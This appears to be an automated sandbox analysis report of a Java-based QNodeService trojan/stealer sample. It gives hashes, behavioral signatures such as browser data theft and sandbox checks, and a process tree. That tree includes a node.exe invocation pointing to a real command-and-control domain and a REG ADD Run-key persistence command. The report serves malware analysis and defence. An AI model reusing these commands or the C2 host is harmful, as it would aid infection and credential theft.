Analysis
-
max time kernel
106s -
max time network
135s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
05-10-2020 13:15
Static task
static1
Behavioral task
behavioral1
Sample
2b5e8601ebef2e9c3b82bfc71f4d9c60.jar
Resource
win7v200722
Behavioral task
behavioral2
Sample
2b5e8601ebef2e9c3b82bfc71f4d9c60.jar
Resource
win10v200722
General
-
Target
2b5e8601ebef2e9c3b82bfc71f4d9c60.jar
-
Size
200KB
-
MD5
2b5e8601ebef2e9c3b82bfc71f4d9c60
-
SHA1
678237fe0071f9ee54c756d71f2e2fc655a27c60
-
SHA256
eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1
-
SHA512
2db0e8586843c48a4cabfbac44d522f9ad94ec55c0d721b3faa5856a4d68e118105d5a3b3800ebe55b1b61913a24601595aa05de266099d19e3ee0656cc45a10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3688 node.exe 2792 node.exe 3036 node.exe -
Loads dropped DLL 6 IoCs
pid Process 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\fc82d951-8a6d-40f7-8c5e-ade60e7d5946 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad77-168.dat js behavioral2/files/0x000100000001ad77-173.dat js behavioral2/files/0x000100000001ad77-177.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 wtfismyip.com 21 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3688 node.exe 3688 node.exe 3688 node.exe 3688 node.exe 2792 node.exe 2792 node.exe 2792 node.exe 2792 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe 3036 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3816 wrote to memory of 3376 3816 java.exe 73 PID 3816 wrote to memory of 3376 3816 java.exe 73 PID 3376 wrote to memory of 3688 3376 javaw.exe 77 PID 3376 wrote to memory of 3688 3376 javaw.exe 77 PID 3688 wrote to memory of 2792 3688 node.exe 79 PID 3688 wrote to memory of 2792 3688 node.exe 79 PID 2792 wrote to memory of 3036 2792 node.exe 80 PID 2792 wrote to memory of 3036 2792 node.exe 80 PID 3036 wrote to memory of 3616 3036 node.exe 82 PID 3036 wrote to memory of 3616 3036 node.exe 82 PID 3616 wrote to memory of 3700 3616 cmd.exe 83 PID 3616 wrote to memory of 3700 3616 cmd.exe 83
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\5aae1218.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain qwertyhills92.spdns.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js --hub-domain qwertyhills92.spdns.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js --hub-domain qwertyhills92.spdns.org5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fc82d951-8a6d-40f7-8c5e-ade60e7d5946" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fc82d951-8a6d-40f7-8c5e-ade60e7d5946" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3700
-
-
-
-
-
-